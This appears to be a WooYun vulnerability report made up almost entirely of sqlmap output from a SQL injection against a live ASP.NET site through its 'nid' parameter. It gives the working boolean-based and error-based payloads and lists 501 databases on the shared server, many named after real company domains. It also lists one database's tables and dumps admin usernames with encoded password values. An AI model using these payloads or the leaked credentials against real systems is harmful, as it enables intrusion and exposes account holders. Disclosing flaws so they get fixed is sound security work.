WooYun.org

sqlmap identified the following injection point(s) with a total of 30 HTTP(s) requests:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=16774 AND 6727=6727
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: nid=16774 AND 2548=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2548=2548) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+CHAR(113)))
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current database:    'DB_31964'
current user is DBA:    False
available databases [501]:
[*] 111
[*] allflex_com_cn
[*] andly_com
[*] andlypack_com
[*] auroragroup_com_cn
[*] baida_finance_com
[*] banyano_com
[*] baolong_biz
[*] bestfeel_net
[*] biadma_com
[*] bjaptps_org
[*] bkmasic_cn
[*] blueprint_com_cn
[*] bmwood_com
[*] bonovo_baa_com
[*] careri_com
[*] ccmaz_com
[*] ceia_org_cn
[*] centerland_com_cn
[*] Charles
[*] china_ether_com
[*] chinagoldrich_com
[*] chinajl_com_cn
[*] chinatitan_com
[*] choicemmed_com
[*] chontdo_com
[*] cigia_org_cn
[*] cimco_com_cn
[*] cn_chinacib_com
[*] coagi_com_cn
[*] cocom_cn
[*] cs_glux_com_cn
[*] cuug_com
[*] cwsforum_com
[*] cycs_com_cn
[*] cycshj_cn
[*] cyfw_com_cn
[*] DB_10445
[*] DB_11190
[*] DB_11191
[*] DB_11227
[*] DB_11789
[*] DB_11832
[*] DB_11892
[*] DB_12209
[*] DB_12720
[*] DB_12729
[*] DB_12766
[*] DB_12906
[*] DB_12907
[*] DB_13053
[*] DB_13392
[*] DB_13901
[*] DB_14294
[*] DB_14295
[*] DB_14320
[*] DB_14586
[*] DB_14755
[*] DB_15144
[*] DB_15159
[*] DB_15529
[*] DB_15549
[*] DB_15582
[*] DB_15786
[*] DB_15787
[*] DB_15852
[*] DB_15964
[*] DB_16393
[*] DB_16432
[*] DB_16809
[*] DB_16942
[*] DB_17020
[*] DB_17071
[*] DB_17659
[*] DB_17680
[*] DB_17848
[*] DB_17851
[*] DB_17859
[*] DB_17903
[*] DB_18104
[*] DB_18105
[*] DB_18131
[*] DB_18181
[*] DB_18632
[*] DB_18828
[*] DB_18884
[*] DB_19385
[*] DB_19386
[*] DB_19391
[*] DB_19454
[*] DB_19455
[*] DB_19456
[*] DB_19461
[*] DB_19530
[*] DB_19547
[*] DB_19655
[*] DB_20094
[*] DB_20225
[*] DB_20267
[*] DB_20278
[*] DB_20283
[*] DB_20291
[*] DB_20322
[*] DB_20339
[*] DB_20354
[*] DB_20395
[*] DB_20540
[*] DB_20675
[*] DB_20725
[*] DB_20727
[*] DB_20788
[*] DB_20838
[*] DB_20946
[*] DB_21140
[*] DB_21237
[*] DB_21244
[*] DB_21690
[*] DB_21935
[*] DB_21936
[*] DB_21962
[*] DB_22173
[*] DB_22227
[*] DB_22275
[*] DB_22395
[*] DB_22396
[*] DB_22421
[*] DB_22457
[*] DB_22476
[*] DB_22477
[*] DB_22491
[*] DB_22594
[*] DB_22636
[*] DB_22655
[*] DB_22676
[*] DB_22677
[*] DB_22678
[*] DB_22746
[*] DB_22750
[*] DB_22766
[*] DB_22886
[*] DB_22939
[*] DB_22948
[*] DB_23086
[*] DB_23088
[*] DB_23089
[*] DB_23186
[*] DB_23242
[*] DB_23296
[*] DB_23530
[*] DB_23706
[*] DB_23731
[*] DB_23757
[*] DB_23780
[*] DB_23802
[*] DB_23805
[*] DB_23927
[*] DB_23985
[*] DB_23994
[*] DB_24018
[*] DB_24020
[*] DB_24057
[*] DB_24058
[*] DB_24122
[*] DB_24241
[*] DB_24243
[*] DB_24293
[*] DB_24318
[*] DB_24363
[*] DB_24424
[*] DB_24425
[*] DB_24476
[*] DB_24493
[*] DB_24518
[*] DB_24553
[*] DB_24554
[*] DB_24555
[*] DB_24556
[*] DB_24557
[*] DB_24558
[*] DB_24559
[*] DB_24560
[*] DB_24564
[*] DB_24568
[*] DB_24569
[*] DB_24612
[*] DB_24613
[*] DB_24615
[*] DB_24618
[*] DB_24638
[*] DB_24690
[*] DB_24721
[*] DB_24736
[*] DB_24741
[*] DB_24832
[*] DB_24838
[*] DB_24875
[*] DB_24933
[*] DB_24958
[*] DB_24975
[*] DB_25033
[*] DB_25114
[*] DB_25119
[*] DB_25125
[*] DB_25127
[*] DB_25155
[*] DB_25164
[*] DB_25183
[*] DB_25360
[*] DB_25367
[*] DB_25372
[*] DB_25373
[*] DB_25554
[*] DB_25605
[*] DB_25640
[*] DB_25641
[*] DB_25651
[*] DB_25655
[*] DB_25657
[*] DB_25808
[*] DB_25812
[*] DB_25818
[*] DB_25821
[*] DB_25828
[*] DB_25830
[*] DB_25904
[*] DB_25954
[*] DB_25957
[*] DB_25958
[*] DB_26010
[*] DB_26055
[*] DB_26084
[*] DB_26117
[*] DB_26238
[*] DB_26285
[*] DB_26297
[*] DB_26306
[*] DB_26371
[*] DB_26478
[*] DB_26495
[*] DB_26498
[*] DB_26520
[*] DB_26544
[*] DB_26549
[*] DB_26554
[*] DB_26617
[*] DB_26619
[*] DB_26650
[*] DB_26651
[*] DB_26672
[*] DB_26695
[*] DB_26698
[*] DB_26928
[*] DB_26929
[*] DB_27016
[*] DB_27153
[*] DB_27200
[*] DB_27228
[*] DB_27229
[*] DB_27376
[*] DB_27417
[*] DB_27419
[*] DB_27450
[*] DB_27493
[*] DB_27598
[*] DB_27741
[*] DB_27782
[*] DB_27934
[*] DB_27935
[*] DB_27972
[*] DB_28021
[*] DB_28025
[*] DB_28029
[*] DB_28217
[*] DB_28283
[*] DB_28354
[*] DB_28396
[*] DB_28402
[*] DB_28415
[*] DB_28683
[*] DB_28737
[*] DB_28748
[*] DB_28801
[*] DB_28829
[*] DB_28859
[*] DB_28860
[*] DB_28897
[*] DB_28934
[*] DB_29038
[*] DB_29039
[*] DB_29090
[*] DB_29091
[*] DB_29124
[*] DB_29134
[*] DB_29140
[*] DB_29170
[*] DB_29172
[*] DB_29173
[*] DB_29174
[*] DB_29176
[*] DB_29177
[*] DB_29178
[*] DB_29249
[*] DB_29253
[*] DB_29260
[*] DB_29567
[*] DB_29607
[*] DB_29681
[*] DB_29774
[*] DB_29804
[*] DB_29841
[*] DB_29889
[*] DB_29898
[*] DB_29913
[*] DB_29917
[*] DB_29974
[*] DB_29976
[*] DB_30087
[*] DB_30425
[*] DB_30461
[*] DB_30462
[*] DB_30471
[*] DB_30552
[*] DB_30568
[*] DB_30573
[*] DB_30587
[*] DB_30595
[*] DB_30597
[*] DB_30613
[*] DB_30629
[*] DB_30713
[*] DB_30714
[*] DB_30715
[*] DB_30727
[*] DB_30972
[*] DB_31125
[*] DB_31133
[*] DB_31144
[*] DB_31145
[*] DB_31172
[*] DB_31205
[*] DB_31209
[*] DB_31218
[*] DB_31224
[*] DB_31265
[*] DB_31280
[*] DB_31298
[*] DB_31299
[*] DB_31382
[*] DB_31403
[*] DB_31454
[*] DB_31479
[*] DB_31480
[*] DB_31482
[*] DB_31484
[*] DB_31489
[*] DB_31507
[*] DB_31531
[*] DB_31548
[*] DB_31563
[*] DB_31609
[*] DB_31721
[*] DB_31743
[*] DB_31744
[*] DB_31790
[*] DB_31839
[*] DB_31877
[*] DB_31907
[*] DB_31936
[*] DB_31938
[*] DB_31964
[*] DB_31970
[*] DB_31973
[*] DB_31987
[*] DB_31993
[*] DB_32067
[*] DB_32092
[*] DB_32167
[*] DB_32226
[*] DB_32253
[*] DB_32264
[*] DB_32266
[*] DB_32377
[*] DB_32580
[*] DB_32709
[*] DB_32732
[*] DB_32739
[*] DB_32746
[*] DB_32824
[*] DB_32834
[*] DB_32902
[*] DB_32932
[*] DB_33161
[*] DB_33179
[*] DB_33190
[*] DB_33217
[*] DB_33223
[*] DB_33224
[*] DB_33299
[*] DB_33333
[*] DB_33401
[*] DB_33402
[*] DB_33404
[*] DB_33405
[*] DB_33417
[*] DB_4198
[*] DB_4199
[*] DB_4200
[*] DB_4201
[*] DB_4249
[*] DB_4255
[*] DB_4278
[*] DB_4317
[*] DB_4331
[*] DB_4353
[*] DB_4367
[*] DB_4626
[*] DB_4717
[*] DB_5517
[*] DB_5562
[*] DB_5566
[*] DB_5567
[*] DB_5887
[*] DB_5888
[*] DB_6170
[*] DB_6171
[*] DB_6293
[*] DB_6541
[*] DB_6542
[*] DB_7048
[*] DB_7068
[*] DB_7070
[*] DB_7625
[*] DB_7854
[*] DB_8091
[*] DB_8203
[*] DB_8204
[*] DB_8213
[*] DB_8219
[*] DB_8244
[*] DB_8481
[*] DB_8603
[*] DB_8695
[*] DB_8699
[*] DB_8724
[*] DB_8731
[*] DB_8735
[*] DB_8888
[*] DB_9417
[*] DB_9457
[*] dovercorporation_com
[*] e_wanjie_com
[*] en_ccmaz_com
[*] en_chinacib_com
[*] en_enhalor_com
[*] enecal_com
[*] enhalor_com
[*] enlegendsilicon_com_
[*] esan_com_cn
[*] euroart_com_cn
[*] evialis_com_cn
[*] fullman_asset
[*] hfkbio_com
[*] hq_b_com
[*] hualongpawn_com
[*] invivo_nsa_com_cn
[*] jingxijiaxiao_com_cn
[*] jloil_com_cn
[*] kingdomtravel_com_cn
[*] lampearl_net
[*] longsheng
[*] luhuadui_com
[*] lusunwyatt_com
[*] master
[*] mdc365_cn
[*] model
[*] msdb
[*] navisystem_com_cn
[*] nccnchina_org_cn
[*] newstar_travel_com
[*] rbgyfz_com_cn
[*] sebiec_com
[*] shiningad_com
[*] sianjia_com
[*] silversun_com_cn
[*] sinopetroleum_com
[*] snccity_com
[*] supercomfort_cn
[*] sureaa_com
[*] sxhdzy_cn
[*] tempdb
[*] ticci_cn
[*] um_hanyi_com_cn
[*] xg_com_cn
[*] xihuahotel_com
[*] xingchuandesign_com
[*] xinyaschool_com
[*] yuancefund_com
[*] zepasia_com
[*] zippovip_com
[*] zjql
[*] zssteelpipe_com

Database: DB_31964
[60 tables]
+-----------------------+
| D99_CMD               |
| D99_REG               |
| D99_Tmp               |
| DIY_TEMPCOMMAND_TABLE |
| S3_Tmp                |
| cms_ad_class          |
| cms_ad_file           |
| cms_ad_mess           |
| cms_admin_files       |
| cms_admin_menu        |
| cms_admin_role        |
| cms_admin_user        |
| cms_admin_userrole    |
| cms_area_city         |
| cms_area_news_column  |
| cms_area_news_info    |
| cms_area_province     |
| cms_bq_info           |
| cms_config            |
| cms_files_images      |
| cms_files_info        |
| cms_files_kind        |
| cms_friend_info       |
| cms_gg_info           |
| cms_hy_info           |
| cms_hy_jf             |
| cms_jytd_news_column  |
| cms_jytd_news_info    |
| cms_magazine_column   |
| cms_magazine_info     |
| cms_maps_info         |
| cms_member_info       |
| cms_member_kind       |
| cms_member_level      |
| cms_member_point      |
| cms_menu_list         |
| cms_message_center    |
| cms_news_column       |
| cms_news_comments     |
| cms_news_info         |
| cms_news_moban        |
| cms_news_pic          |
| cms_person_info       |
| cms_position_info     |
| cms_qixia_column      |
| cms_qixia_info        |
| cms_question_info     |
| cms_related_news      |
| cms_relates_our       |
| cms_reply_info        |
| cms_role_function     |
| cms_shenqing_info     |
| cms_smtp              |
| cms_user_column       |
| cms_ziliao            |
| comdlist              |
| dtproperties          |
| jiaozhu               |
| kill_kk               |
| oldnews               |
+-----------------------+

Database: DB_31964
Table: cms_admin_user
[11 entries]
+---------------+-------------+--------+----------+----------+--------------------+--------------+----------+--------------------------+--------------------+
| UUID          | column_uuid | IS_USE | USERNAME | is_child | END_TIME           | PASSWORD     | ADD_TIME | USER_TYPE                | START_TIME         |
+---------------+-------------+--------+----------+----------+--------------------+--------------+----------+--------------------------+--------------------+
| 6fc4a95308661 | +           | 1      | liufan   | +        | +                  | 7L1qpW8a9sM= | +        | +                        | +                  |
| admin         | 0           | 1      | admin    | 1        | 08+15+2006++4:28PM | 52ZW7p7z9eM= | +        | %u7cfb%u7edf%u7528%u6237 | 08+15+2006++4:28PM |
| c0a891025143  | +           | 1      | zxgl     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a891047010  | +           | 1      | cskf     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a89106401   | +           | 1      | jcss     | +        | +                  | V7NeHE+IO4s= | +        | +                        | +                  |
| c0a891067359  | +           | 1      | fhhw     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a891070451  | +           | 1      | fhjs     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a891072027  | +           | 1      | cyy      | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a89107679   | +           | 1      | rlzy     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a89107935   | +           | 1      | kcsj     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a891092319  | +           | 1      | fhdc     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
+---------------+-------------+--------+----------+----------+--------------------+--------------+----------+--------------------------+--------------------+